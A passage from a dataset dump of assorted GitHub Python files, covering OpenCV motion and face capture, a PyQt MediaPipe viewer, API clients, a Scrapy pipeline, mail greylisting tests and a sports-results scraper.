如果视频结束,跳出循环\n if not ret:\n break\n frame = cv.resize(frame, (500, 500), interpolation=cv.INTER_CUBIC)\n frame_motion = frame.copy()\n\n # 计算前景掩码\n fgmask = fgbg.apply(frame_motion)\n draw1 = cv.threshold(fgmask, 25, 255, cv.THRESH_BINARY)[1] # 二值化\n draw1 = cv.dilate(draw1, kernel, iterations=1)\n\n # 查找检测物体的轮廓,只检测外轮廓,只需4个点来保存轮廓信息\n image_m, contours_m, hierarchy_m = cv.findContours(draw1.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\n for c in contours_m:\n if cv.contourArea(c) < 300:\n continue\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(frame_motion, (x, y), (x + w, y + h), color_m, 2)\n\n cv.imshow(\"source\", frame_motion)\n cv.imshow(\"apply\", fgmask)\n cv.imshow(\"draw\", draw1)\n k = cv.waitKey(200)\n if k == ord('q'):\n break\n\n out.write(frame_motion) # 保存\n\nout.release()\ncap.release()\ncv.destroyAllWindows()","repo_name":"070411209/GAAS-Object-Tracking","sub_path":"KCF/python/testBS.py","file_name":"testBS.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35505576192","text":"import cv2\nimport sys\nfrom PyQt5.QtCore import * \nfrom PyQt5.QtGui import * \nfrom PyQt5.QtWidgets import * \nimport mediapipe as 
mp\nimport time\nimport threading\nimport argparse\n\n\nclass Thread(QThread):\n \n changePixmap = pyqtSignal(QImage)\n frame_buffer = []\n\n def read_frames(self, path_to_video_file):\n \"\"\"method to read all frames in video regardless (to be run in a parallel thread to processing code)\"\"\"\n global frame_buffer\n cap = cv2.VideoCapture(path_to_video_file)\n done = False\n while not done:\n ret, image = cap.read()\n if not ret:\n done = True\n return\n else:\n self.frame_buffer.append(image)\n \n\n def process_image(self, image):\n \"\"\"adds annotations to image for the models you have selected, \n For now, it just depict results from hand detection\n TODO: add all models, and link with radio buttons on UI\n \"\"\"\n global hand_detection_toggle\n global face_mesh_toggle\n global pose_detection_toggle\n\n\n hand_detection_results = None\n face_mesh_results = None\n pose_results = None\n\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # hand detection\n if hand_detection_toggle:\n with mp_hands.Hands(\n max_num_hands=1000,\n model_complexity=0,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5) as hands:\n hand_detection_results = hands.process(image)\n\n\n # face mesh\n if face_mesh_toggle:\n with mp_face_mesh.FaceMesh(\n static_image_mode=True,\n refine_landmarks=True,\n max_num_faces=1000,\n min_detection_confidence=0.5) as face_mesh:\n face_mesh_results = face_mesh.process(image)\n \n\n if pose_detection_toggle:\n with mp_pose.Pose(\n static_image_mode=True, min_detection_confidence=0.5, model_complexity=2) as pose:\n pose_results = pose.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n \n\n\n # annotations of results onto image\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n \n \n # hand-detection annotations\n if hand_detection_toggle and hand_detection_results and hand_detection_results.multi_hand_landmarks:\n for hand_landmarks in hand_detection_results.multi_hand_landmarks:\n mp_drawing.draw_landmarks(\n image,\n hand_landmarks,\n mp_hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style())\n \n # face-mesh annotations\n if face_mesh_toggle and face_mesh_results and face_mesh_results.multi_face_landmarks:\n for face_landmarks in face_mesh_results.multi_face_landmarks:\n mp_drawing.draw_landmarks(\n image=image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_TESSELATION,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_tesselation_style())\n mp_drawing.draw_landmarks(\n image=image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_CONTOURS,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_contours_style())\n mp_drawing.draw_landmarks(\n image=image,\n landmark_list=face_landmarks,\n connections=mp_face_mesh.FACEMESH_IRISES,\n landmark_drawing_spec=None,\n connection_drawing_spec=mp_drawing_styles\n .get_default_face_mesh_iris_connections_style())\n \n # pose detection annotations\n if pose_detection_toggle and pose_results and pose_results.pose_landmarks:\n mp_drawing.draw_landmarks(\n image,\n pose_results.pose_landmarks,\n mp_pose.POSE_CONNECTIONS,\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style()) \n\n return image\n\n\n def emit_signal(self, image):\n rgbImage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n h, w, ch = rgbImage.shape\n bytesPerLine = ch * w\n convertToQtFormat = 
QImage(rgbImage.data, w, h, bytesPerLine, QImage.Format_RGB888)\n p = convertToQtFormat.scaled(HEIGHT, WIDTH, Qt.KeepAspectRatio)\n self.changePixmap.emit(p)\n return\n\n\n def window_update_prerecorded(self, PATH):\n # PATH = \"/Users/saahith/Desktop/mediapipe-GUI/test2.mp4\"\n cap = cv2.VideoCapture(PATH)\n frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)\n fps = int(cap.get(cv2.CAP_PROP_FPS))\n duration = frames/fps\n start = time.time()\n \n while True:\n current_time = time.time()\n frame_index = int((current_time - start)/duration * frames)\n if frame_index < len(self.frame_buffer):\n print(\"index: \", frame_index)\n print(\"length of buffer: \", len(self.frame_buffer))\n image = self.frame_buffer[frame_index]\n image = self.process_image(image)\n self.emit_signal(image)\n\n def window_update_webcam(self):\n while True:\n if len(self.frame_buffer) > 0:\n image = self.frame_buffer[-1]\n image = self.process_image(image)\n self.emit_signal(image)\n\n\n def run(self):\n global VIDEO_PATH\n # use_webcam = True\n # PATH = \"/Users/saahith/Desktop/mediapipe-GUI/test.mp4\"\n # if PATH==0:\n # PATH = 0\n t1 = threading.Thread(target=self.read_frames, args=(VIDEO_PATH,))\n if VIDEO_PATH == 0:\n t2 = threading.Thread(target=self.window_update_webcam, args=())\n else:\n t2 = threading.Thread(target=self.window_update_prerecorded, args=(VIDEO_PATH,))\n\n # \n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n\n\n\nclass App(QMainWindow):\n def __init__(self):\n super().__init__()\n self.title = 'MediaPipe GUI'\n self.left = 100\n self.top = 100\n self.width = HEIGHT\n self.height = WIDTH\n self.initUI()\n\n @pyqtSlot(QImage)\n def setImage(self, image):\n self.label.setPixmap(QPixmap.fromImage(image))\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.resize(1800, 1200)\n # create a label\n self.label = QLabel(self)\n self.label.move(325, 120)\n\n\n self.label.resize(WIDTH, HEIGHT)\n th = Thread(self)\n th.changePixmap.connect(self.setImage)\n th.start()\n\n\n # Hand detection toggle button\n self.hand_detection_button = QPushButton(\"Hand Detection\", self)\n self.hand_detection_button.setGeometry(525, 150, 100, 40)\n self.hand_detection_button.setCheckable(True)\n self.hand_detection_button.clicked.connect(self.hand_detection_toggle_switch)\n self.hand_detection_button.setStyleSheet(\"background-color : lightgrey\")\n\n\n # face mesh toggle\n self.face_mesh_button = QPushButton(\"Face Mesh\", self)\n self.face_mesh_button.setGeometry(675, 150, 100, 40)\n self.face_mesh_button.setCheckable(True)\n self.face_mesh_button.clicked.connect(self.face_mesh_toggle_switch)\n self.face_mesh_button.setStyleSheet(\"background-color : lightgrey\")\n\n # pose_detection toggle\n self.pose_detection_button = QPushButton(\"Pose Detection\", self)\n self.pose_detection_button.setGeometry(825, 150, 100, 40)\n self.pose_detection_button.setCheckable(True)\n self.pose_detection_button.clicked.connect(self.pose_detection_toggle_switch)\n self.pose_detection_button.setStyleSheet(\"background-color : lightgrey\")\n\n self.update()\n self.show()\n\n\n def hand_detection_toggle_switch(self):\n global hand_detection_toggle\n hand_detection_toggle = not hand_detection_toggle\n if self.hand_detection_button.isChecked():\n self.hand_detection_button.setStyleSheet(\"background-color : lightblue\")\n else:\n self.hand_detection_button.setStyleSheet(\"background-color : lightgrey\")\n \n def face_mesh_toggle_switch(self):\n global face_mesh_toggle\n 
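Editor's note on the GUI.py record above: process_image constructs a fresh MediaPipe model inside a `with` block for every frame, which is expensive; a long-lived detector is usually reused across frames instead. A hedged sketch using only the mediapipe and cv2 calls the record itself imports (the class name is hypothetical):

import cv2
import mediapipe as mp

class HandAnnotator:
    """Create the MediaPipe hands model once and reuse it per frame."""
    def __init__(self):
        self.hands = mp.solutions.hands.Hands(
            model_complexity=0,
            min_detection_confidence=0.5,
            min_tracking_confidence=0.5)

    def process(self, bgr_frame):
        # MediaPipe expects RGB input; OpenCV frames arrive as BGR.
        rgb = cv2.cvtColor(bgr_frame, cv2.COLOR_BGR2RGB)
        return self.hands.process(rgb)

    def close(self):
        self.hands.close()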
face_mesh_toggle = not face_mesh_toggle\n if self.face_mesh_button.isChecked():\n self.face_mesh_button.setStyleSheet(\"background-color : lightblue\")\n else:\n self.face_mesh_button.setStyleSheet(\"background-color : lightgrey\")\n \n def pose_detection_toggle_switch(self):\n global pose_detection_toggle\n pose_detection_toggle = not pose_detection_toggle\n if self.pose_detection_button.isChecked():\n self.pose_detection_button.setStyleSheet(\"background-color : lightblue\")\n else:\n self.pose_detection_button.setStyleSheet(\"background-color : lightgrey\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"Run MediaPipe models on specified video feed\")\n parser.add_argument('video_feed', default='webcam', nargs='?')\n\n\n mp_drawing = mp.solutions.drawing_utils\n mp_drawing_styles = mp.solutions.drawing_styles\n\n\n mp_hands = mp.solutions.hands\n mp_face_mesh = mp.solutions.face_mesh\n mp_pose = mp.solutions.pose\n\n\n WIDTH = 1000\n HEIGHT = 800\n\n hand_detection_toggle = False\n face_mesh_toggle = False\n pose_detection_toggle = False\n\n\n VIDEO_PATH = 0\n args = parser.parse_args()\n if args.video_feed.lower() != 'webcam':\n VIDEO_PATH = args.video_feed\n \n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec_())\n","repo_name":"saahithjanapati/mediapipe-GUI","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":10243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"30397664365","text":"\nimport requests\n\ndef getTargetedTaxonomicOrFunctionalGroupItem(\n host\n # Path parameters\n , \n path_id\n \n \n \n ,\n # Headers\n headers = None\n):\n final_path = \"/targeted_taxonomic_or_functional_groups/{id}\".format(\n id = path_id\n )\n \n \n \n response = requests.get(\n url = host + final_path,\n headers = headers \n )\n\n return response\n\n ","repo_name":"guilhemheinrich/deepomics-python-client","sub_path":"src/getTargetedTaxonomicOrFunctionalGroupItem.py","file_name":"getTargetedTaxonomicOrFunctionalGroupItem.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70445195512","text":"import os\nimport shutil\nimport warnings\n# import cv2\nimport io\n \nfrom PIL import Image\nwarnings.filterwarnings(\"error\", category=UserWarning)\n \nbase_dir = \"./dataset\"\n\ndef is_read_successfully(file):\n try:\n imgFile = Image.open(file)\n return True\n except Exception:\n return False\n\n\ni = 0\nfor r in os.listdir(base_dir):\n if r=='.DS_Store':#在这里我们在 .DS_Store 跳过,如果要是有需要的删除.DS_Store文件,可以进行微调\n print(base_dir,r)\n continue \n print(r)\n for j in os.listdir(os.path.join('./dataset',r)):\n if not is_read_successfully(f\"{base_dir}/{r}/{j}\"):\n i = i+1\n print(i)\n\n","repo_name":"boyzwj/gan_tool","sub_path":"fixdata.py","file_name":"fixdata.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"70517637433","text":"import sys\nfrom collections import defaultdict\n\ninput = sys.stdin.readline\n\n\nN,M = map(int,input().split())\n\n\nn_dict = defaultdict(int)\n\nfor _ in range(N):\n n_dict[input().rstrip()]\n\n\nfor _ in range(M):\n k = input().rstrip()\n \n if k in n_dict:\n n_dict[k] += 1\n\nsum = 0\nfor i in n_dict.values():\n sum += i\n\nprint(sum)\n\n\n","repo_name":"enaa99/-Python","sub_path":"baekjoonPython/string/14425문자열 집합.py","file_name":"14425문자열 
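Editor's note on the Baekjoon 14425 record above: counting hits with a defaultdict works, but membership in a plain set expresses the same thing more directly. A sketch under the problem's input format as shown in the record (N names, then M whitespace-separated query strings):

import sys

def count_members(names, queries):
    """Count how many query strings belong to the given name set."""
    name_set = set(names)
    return sum(1 for q in queries if q in name_set)

if __name__ == "__main__":
    data = sys.stdin.read().split()
    n, m = int(data[0]), int(data[1])
    names, queries = data[2:2 + n], data[2 + n:2 + n + m]
    print(count_members(names, queries))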
집합.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"73819460471","text":"from orca_dataset_generator import DataGenerator\r\nif __name__ == \"__main__\":\r\n\r\n \"\"\"One can create an instance of the “DataGenerator” class. It takes 4 arguments-\r\n 1.\ttrain_orca_calls_path- Path to the directory containing isolated orca vocals to be used for training.\r\n 2.\ttrain_noise_path- Path to the directory containing noise (from boats,ships,etc.) to be overlapped with\r\n orca vocals for training.\r\n 3.\tval_orca_calls_path- Path to the directory containing isolated orca vocals to be used for validation.\r\n 4.\tval_noise_path- Path to the directory containing noise (from boats,ships,etc.) to be overlapped with\r\n orca vocals for validation.\r\n \"\"\"\r\n\r\n generator = DataGenerator(train_orca_calls_path=\"training_data/calls\",\r\n train_noise_path=\"training_data/noise\",\r\n val_orca_calls_path=\"validation_data/calls\",\r\n val_noise_path=\"validation_data/noise\")\r\n\r\n \"\"\"Next one can call the member function “generate_dataset” to generate their custom dataset. This function also\r\n takes 4 parameters as arguments-\r\n 1.\ttraining_dataset_size- Size of the training dataset.\r\n 2.\tvalidation_dataset_size- Size of the validation dataset.\r\n 3.\toutput_path- Directory where you want to save the dataset.\r\n 4.\tchannels- The number of channels- single channel (mono) or double channel (stereo), you want\r\n in the generated audio files.\r\n \"\"\"\r\n generator.generate_dataset(training_dataset_size=500,\r\n validation_dataset_size=100,\r\n output_path=\"generated_dataset\",\r\n channels=2)\r\n","repo_name":"orcasound/acoustic-separation","sub_path":"Dataset_generator/generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"38738415555","text":"# %%\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nmain_folder = \"../../\"\n\n# %%\n\ndata_Cpp = []\nchunk_size = 1_000_000\nalg = \"_Spec\"\n\nwith open(f\"{main_folder}results/Cpp_Python/{chunk_size}_Cpp{alg}.txt\", \"r\") as f:\n for line in f.readlines():\n data_Cpp.append(float(line))\n\ndata_Cpp = np.array(data_Cpp)\n\ndata_Python_Cpp = []\n\nwith open(f\"{main_folder}results/Cpp_Python/{chunk_size}_Python_Cpp{alg}.txt\", \"r\") as f:\n for line in f.readlines():\n data_Python_Cpp.append(float(line))\n\ndata_Python_Cpp = np.array(data_Python_Cpp[:len(data_Cpp)])\n\ndata_Python = []\n\nwith open(f\"{main_folder}results/Cpp_Python/{chunk_size}_Python{alg}.txt\", \"r\") as f:\n for line in f.readlines():\n data_Python.append(float(line))\n\ndata_Python = np.array(data_Python[:len(data_Cpp)])\n\nplt.rc('xtick', labelsize=15) \nplt.rc('ytick', labelsize=15)\n\nplt.rc('axes', labelsize=20)\nline_width=2\n\nplt.plot(data_Cpp, linewidth=line_width, label = \"C++\")\nplt.plot(data_Python, linewidth=line_width, label = \"Python\")\nplt.plot(data_Python_Cpp, linewidth=line_width, label = \"Hybrid\")\nplt.legend(prop={'size': 15})\n\nplt.tight_layout()\nplt.savefig(f\"{main_folder}results/Images/Interface/{chunk_size}.png\")\n\nplt.show()\n# %%\n\n\ndiff_Cpp = data_Cpp[1:] - data_Cpp[:-1]\ndiff_Python = data_Python[1:] - data_Python[:-1]\ndiff_Python_Cpp = data_Python_Cpp[1:] - data_Python_Cpp[:-1]\n\n# %%\nnum_batches = 100\nchunks = range(0, len(diff_Python), 
num_batches)\nbatches = [x for x in range(len(diff_Python)) if x % num_batches != 0]\n \n# %%\n\nplt.hist(diff_Cpp[chunks], alpha=0.8, label = \"C++\")\nplt.hist(diff_Python[chunks], alpha=0.8, label = \"Python\")\nplt.hist(diff_Python_Cpp[chunks], alpha=0.8, label = \"Hybrid\")\nplt.legend()\nplt.show()\n\n# %%\n\n\nprint(diff_Cpp[-1])\n","repo_name":"DanteNiewenhuis/TMVA-batching","sub_path":"Python_files/analysis/analyse_Interface.py","file_name":"analyse_Interface.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"30404596493","text":"import re\nimport requests\nimport json\n\ndef remove_time_stamp(content):\n if not content:\n return content\n # Remove time stamp\n new_content = re.sub(r\"\\d{2}:\\d{2}:\\d{2}\", \"\", content)\n new_content = re.sub(r\"\\[\\d{4}-\\d{2}-\\d{2}.*?\\]\", \"\", new_content)\n return new_content\n\ndef extract_quotation_content(content):\n pattern = \"\\`\\`\\`([\\s\\S]*?)\\`\\`\\`\"\n substring = re.findall(pattern, content)\n if (len(substring) >= 1):\n result=' '.join(substring)\n return result\n\ndef query_trss_for_jenkins_output(jenkins_url, test_name, trss_servers=[\"https://trss.adoptium.net\"]):\n #Get build info from TRSS\n query_url = \"https://trss.adoptium.net/api/parseJenkinsUrl\"\n query_params = {\"jenkinsUrl\": jenkins_url}\n output = requests.get(query_url, query_params)\n output_dict = json.loads(output.content)\n\n if \"output\" not in output_dict:\n raise Exception(\"No response received from TRSS while parsing Jenkins Url\")\n return \"\"\n\n output_dict = output_dict[\"output\"]\n\n if output_dict[\"errorMsg\"]:\n raise Exception(\"Failed to parse Jenkins Url with error message: \" + output_dict[\"errorMsg\"])\n return \"\"\n\n url = output_dict[\"serverUrl\"]\n build_name = output_dict[\"buildName\"]\n build_num = output_dict[\"buildNum\"]\n\n query_params = {\"url\": url,\n \"buildName\": build_name,\n \"buildNum\": build_num,\n \"testName\": test_name,}\n\n print(\"Query parameters:\")\n print(query_params)\n\n for server in trss_servers:\n #Try to fetch test data from server\n query_url = f\"{server}/api/getOutputByTestInfo\"\n print(f\"\\nQuerying url: {query_url}\")\n\n output = requests.get(query_url, query_params)\n data = json.loads(output.content)\n\n if \"output\" in data:\n return data[\"output\"]\n\n\n print(\"Couldn't find data for test\")\n return \"\"\n\ndef extract_jenkins_link_and_testname(content):\n jenkins_links = []\n test_names = []\n\n splitted_content = content.split()\n pattern = r\"(https:\\/\\/.+\\/job\\/Test_openjdk\\d+.+\\/\\d+)\"\n for word in splitted_content:\n adoptium_jenkins_links = re.findall(pattern, word)\n jenkins_links += adoptium_jenkins_links\n\n pattern2 = r\"(?<=\\`)Test_openjdk\\d+.+?\\/?(?=\\`)\"\n internal_jenkins_job_names = re.findall(pattern2, content)\n extracted_internal_links = [''.join(('https://internal_jenkins/job/',x)) for x in internal_jenkins_job_names]\n jenkins_links += extracted_internal_links\n\n pattern3 = r\"[a-zA-Z].+\\d+(?=_FAILED)\" # For \"testname_FAILED\" to testname\n for word in splitted_content:\n extracted_test = re.findall(pattern3, word)\n test_names += extracted_test\n\n pattern4 = r\"(?<=Test Name: ).+_\\d+\" # \"Test Name: HCRLateAttachWorkload_0\" to \"HCRLateAttachWorkload_0\"\n special_test_names = re.findall(pattern4, content)\n test_names += special_test_names\n\n return jenkins_links, 
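Editor's note on the preprocess_data.py record above: remove_time_stamp strips bare HH:MM:SS stamps and bracketed ISO-date prefixes with two re.sub passes. A self-contained check of those exact patterns, copied verbatim from the record; the sample log line is made up:

import re

def remove_time_stamp(content):
    if not content:
        return content
    content = re.sub(r"\d{2}:\d{2}:\d{2}", "", content)       # bare 12:34:56 stamps
    return re.sub(r"\[\d{4}-\d{2}-\d{2}.*?\]", "", content)   # [2021-03-04 ...] prefixes

if __name__ == "__main__":
    line = "[2021-03-04 10:11] build started 12:34:56 ok"
    print(remove_time_stamp(line))  # " build started  ok"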
test_names\n","repo_name":"payalharisinghani/aqa-test-tools","sub_path":"MachineLearningPrototype/utils/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"20881991059","text":"import sqlite3\nconn = sqlite3.connect('example.db')\n\nc = conn.cursor()\n\n# Do this instead\nt = ('RHAT',)\nc.execute('SELECT * FROM stocks WHERE symbol=?', t)\n\n\nprint('Chapter table has these columns:')\nfor column_info in c.description:\n print(column_info)\n\n\n# We can also close the connection if we are done with it.\n# Just be sure any changes have been committed or they will be lost.\nconn.close()","repo_name":"Naresh-Chaurasia/AdvancedPython-DataScience-MachineLearning","sub_path":"com.c2t.db.sqlite/06-SQLite-select-meta.py","file_name":"06-SQLite-select-meta.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70331796472","text":"import cv2\nimport sys\n\n\ndef main():\n # trackers covered in this scope-\n # KCF, MIL, TLD, CSRT\n cap = cv2.VideoCapture(\"/home/sabbir/Videos/sattelite.m4v\")\n tracker = cv2.TrackerMIL_create()\n\n bbox = None\n msg = None\n box = None\n while True:\n ret, frame = cap.read()\n if not ret:\n print(\"[ERROR] Parsing is false\")\n\n if bbox is not None:\n msg, box = tracker.update(frame)\n \n if msg:\n x, y, w, h = [p for p in box]\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 200, 3), 1)\n\n cv2.imshow(f\"MIL Tracker\", frame)\n\n if cv2.waitKey(10) & 0xff == 27:\n break\n if cv2.waitKey(10) & 0xff == ord('t'):\n bbox = cv2.selectROI(\"Select box to track\", frame, fromCenter=False,\n\t\t\tshowCrosshair=True)\n tracker.init(frame, bbox)\n \n cap.release()\n cv2.destroyAllWindows()\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"by-sabbir/sabbir.dev-blogposts","sub_path":"object-tracker/mil_tracker.py","file_name":"mil_tracker.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"37257723756","text":"import cv2 \nimport sqlite3\n\ncam = cv2.VideoCapture(0)\ndetector=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\ndef InsertndUpdate(id,name,department,gender,course_name):\n conn = sqlite3.connect(\"studentsFaceData.db\")\n cmd = \"SELECT * FROM students WHERE roll=\"+ str(id)\n cursor = conn.execute(cmd)\n existence = 0\n for row in cursor:\n existence = 1\n if(existence == 1):\n change = input('Roll number already exists do you want to replace it?(y/n):')\n if(change == 'y'):\n cmd = \"UPDATE students SET name=\"+str(name)+\" WHERE roll=\"+str(id)\n else:\n print(\"no change made\")\n conn.close()\n else:\n cmd = \"INSERT INTO students(roll,name,department,gender,studying) Values(\"+str(id)+\",\"+str(name)+\",\"+str(department)+\",\"+str(gender)+\",\"+str(course_name)+\")\"\n conn.execute(cmd)\n conn.commit()\n conn.close()\n\n\nroll_no = input('enter the roll no: ')\nname = input('Enter the name: ')\ncourse_name = input(\"Enter Course name(B.E/B.sc..):\")\ndepartment = input(\"Enter the department:\")\ngender = input(\"enter the gender:\")\nInsertndUpdate(roll_no,name,department,gender,course_name)\n\n\ni = 0 \n\nwhile 1:\n ret, img = cam.read()\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n face = detector.detectMultiScale(gray_img, 1.3, 5)\n\n for (x,y,w,h) in face:\n cv2.rectangle( img, (x,y), 
(x+w,y+h), (255,255,0), 1)\n cv2.imwrite(\"face_data/students.\"+roll_no+'.'+str(i)+\".jpg\",gray_img[y:y+h,x:x+w])\n i += 1\n cv2.imshow('Data Creator',img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n elif i>100:\n break\n\ncam.release()\ncam.destroyAllWindows()","repo_name":"holmesvinn/Attendance","sub_path":"datasetCreator.py","file_name":"datasetCreator.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15330301730","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\nimport csv\n\n\nclass MaoyanPipeline:\n def open_spider(self, spider):\n self.file = open('maoyan.csv', 'w', newline='', encoding='utf-8-sig')\n self.writer = csv.writer(self.file)\n self.writer.writerow(['movie_id',\n 'movie_name',\n 'sum_box_desc',\n 'box_desc',\n 'box_rate',\n 'show_count_rate',\n 'seat_count_rate'])\n\n def process_item(self, item, spider):\n self.writer.writerow([item['movie_id'],\n item['movie_name'],\n item['sum_box_desc'],\n item['box_desc'],\n item['box_rate'],\n item['show_count_rate'],\n item['seat_count_rate']])\n return item\n\n def close_spider(self, spider):\n self.file.close()\n","repo_name":"Kameees/movie_spider","sub_path":"maoyan/maoyan/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"36963849321","text":"\"\"\"Tests for greylisting service\"\"\"\nimport pytest\nfrom smtplib import SMTP, SMTPRecipientsRefused\nimport logging\n\nfrom chapps.tests.test_policy.conftest import clear_redis_grl, populate_redis_grl\nfrom services.tests.conftest import known_sender\n\n\ndef test_chapps_grl_first_attempt_denied(\n caplog,\n clear_redis_grl,\n chapps_grl_service,\n known_sender,\n grl_test_recipients,\n grl_test_message_factory,\n):\n \"\"\"\n GIVEN a new email delivery attempt, for an unrecognized tuple\n WHEN presented for delivery\n THEN it should be denied\n \"\"\"\n caplog.set_level(logging.DEBUG)\n message = grl_test_message_factory(known_sender, grl_test_recipients)\n with SMTP(\"127.0.0.1\") as smtp:\n with pytest.raises(SMTPRecipientsRefused):\n assert smtp.sendmail(known_sender, grl_test_recipients, message)\n\n\ndef test_chapps_grl_acceptance_after_deferral(\n caplog,\n chapps_grl_service_with_tuple,\n known_sender,\n grl_test_recipients,\n grl_test_message_factory,\n):\n \"\"\"\n GIVEN an email is being retried after deferral (the tuple has been seen)\n WHEN presented for delivery\n THEN it should be accepted (using DUNNO to allow other filters)\n \"\"\"\n caplog.set_level(logging.DEBUG)\n message = grl_test_message_factory(known_sender, grl_test_recipients)\n with SMTP(\"127.0.0.1\") as smtp:\n result = smtp.sendmail(known_sender, grl_test_recipients, message)\n assert True # email was accepted\n\n\ndef test_chapps_grl_accept_emails_from_proven_clients(\n caplog,\n chapps_grl_service_with_tally,\n known_sender,\n grl_test_recipients,\n grl_test_message_factory,\n):\n \"\"\"\n GIVEN a new email, but from a recognized-reliable client (source IP)\n WHEN presented for delivery\n THEN it should be accepted (using DUNNO to allow other filters)\n \"\"\"\n caplog.set_level(logging.DEBUG)\n message = 
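Editor's note on the datasetCreator.py record above: the final cleanup calls cam.destroyAllWindows(), but that function lives on the cv2 module (cv2.destroyAllWindows()), not on VideoCapture; the record also builds SQL by string concatenation, which breaks on unquoted text and invites injection. A hedged sketch of the parameterized form, reusing the table and columns named in the record:

import sqlite3

def insert_or_update(conn, roll, name, department, gender, studying):
    """Upsert a student row using placeholders instead of string-built SQL."""
    cur = conn.execute("SELECT 1 FROM students WHERE roll = ?", (roll,))
    if cur.fetchone():
        conn.execute("UPDATE students SET name = ? WHERE roll = ?", (name, roll))
    else:
        conn.execute(
            "INSERT INTO students(roll, name, department, gender, studying) "
            "VALUES (?, ?, ?, ?, ?)",
            (roll, name, department, gender, studying))
    conn.commit()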
grl_test_message_factory(known_sender, grl_test_recipients)\n with SMTP(\"127.0.0.1\") as smtp:\n result = smtp.sendmail(known_sender, grl_test_recipients, message)\n assert True # if we get here w/o error, the email was accepted\n","repo_name":"easydns/chapps","sub_path":"services/tests/test_greylisting/test_greylisting.py","file_name":"test_greylisting.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"95"} +{"seq_id":"39115997273","text":"from functools import lru_cache\nfrom dateutil import parser\nimport time\nfrom collections import namedtuple\n\nfrom base_scraper import BaseScraper\n\nBASE_URL = \"http://taboracademy.net/nessa/\"\n\n\nSchool = namedtuple('School', 'id name')\nRace = namedtuple('Race', 'school_id opponent_id date school_score opponent_score')\n\nNAME_MAPPINGS = {\n 'Bishop Hendricken High School' : 'Bishop Hendricken HS',\n 'Bishop Hendricken HS': 'Bishop Hendricken HS',\n 'Boston Latin School':'Boston Latin High School',\n 'Portland HS':'Portland High School',\n \"St. Sebastian's Country Day School\":\"St Sebastian's School\",\n 'Sturgis East Charter School':'Sturgis Charter School',\n 'Swampscott High School':'Swampscott HS',\n 'Valley Regional High School ':'Valley Regional High School',\n 'Valley Regional High School \\xa0':'Valley Regional High School'\n}\n\n\nclass ResultsScraper(BaseScraper):\n def __init__(self, schools, races, url, link):\n self.schools = schools\n self.races = races\n self.name = link.text_content()\n self.url = url + link.attrib['href']\n\n def _school(self, name=None):\n name = NAME_MAPPINGS.get(name or self.name, name or self.name)\n school = self.schools.get(name, School(name=name, id=name))\n self.schools[school.id] = school\n return school\n\n def _create_race(self, match):\n print(match)\n results = [int(s) for s in match['Score'].replace(\" \", \"\").split(\"-\") if s != \"\"]\n school_score, opponent_score = 